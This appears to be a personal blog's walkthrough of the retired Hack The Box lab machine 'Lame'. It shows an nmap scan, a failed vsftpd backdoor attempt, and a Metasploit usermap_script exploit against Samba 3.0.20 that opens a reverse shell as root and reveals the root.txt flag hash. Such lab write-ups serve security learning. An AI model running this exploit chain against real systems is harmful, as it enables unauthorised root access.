18 January 2022

Pentesting Fun Stuff

following the cyber security path…

HTB: Lame

4 years ago n0w4n

Introduction

This is a machine from hackthebox.eu. According to the HTB policy I can publish this write-up seeing the machine is ‘retired’.

Enumeration

Starting with a portscan.

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 08:54 CEST
Nmap scan report for 10.10.10.3
Host is up (0.025s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-09-29T02:55:45-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   27.12 ms 10.10.14.1
2   24.79 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.03 seconds

On first sight I would think that my entry point is the ftp service running on port 21. This particular version has a intended backdoor and is easily accessible from the outside. Oddly enough after several tries this known backdoor isn’t responding. Time to check on the next possible vulnerability.
After checking exploit-db it seems this samba version is vulnerable.

msf exploit(usermap_script) > exploit -j
[*] Exploit running as background job 3.
[*] Started reverse TCP double handler on 10.10.14.3:4444
msf exploit(usermap_script) > [*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i2UsybyxuoY1LtnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i2UsybyxuoY1LtnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:45093) at 2017-09-29 09:12:49 +0200

msf exploit(usermap_script) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root)

cd /root
ls -lah
total 80K
drwxr-xr-x 13 root root 4.0K Sep 28 23:47 .
drwxr-xr-x 21 root root 4.0K May 20  2012 ..
-rw-------  1 root root  373 Sep 28 23:47 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
drwx------  3 root root 4.0K May 20  2012 .config
drwx------  2 root root 4.0K May 20  2012 .filezilla
drwxr-xr-x  5 root root 4.0K Sep 28 23:47 .fluxbox
drwx------  2 root root 4.0K May 20  2012 .gconf
drwx------  2 root root 4.0K May 20  2012 .gconfd
drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
drwx------  4 root root 4.0K May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4.0K May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
drwx------  2 root root 4.0K Sep 28 23:47 .vnc
drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-------  1 root root   33 Mar 14  2017 root.txt
-rw-r--r--  1 root root  118 Sep 28 23:47 vnc.log
cat root.txt
92caac3be140ef409e45721348a4e9df

And there is the needed hash to prove me owning this box.
 

Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.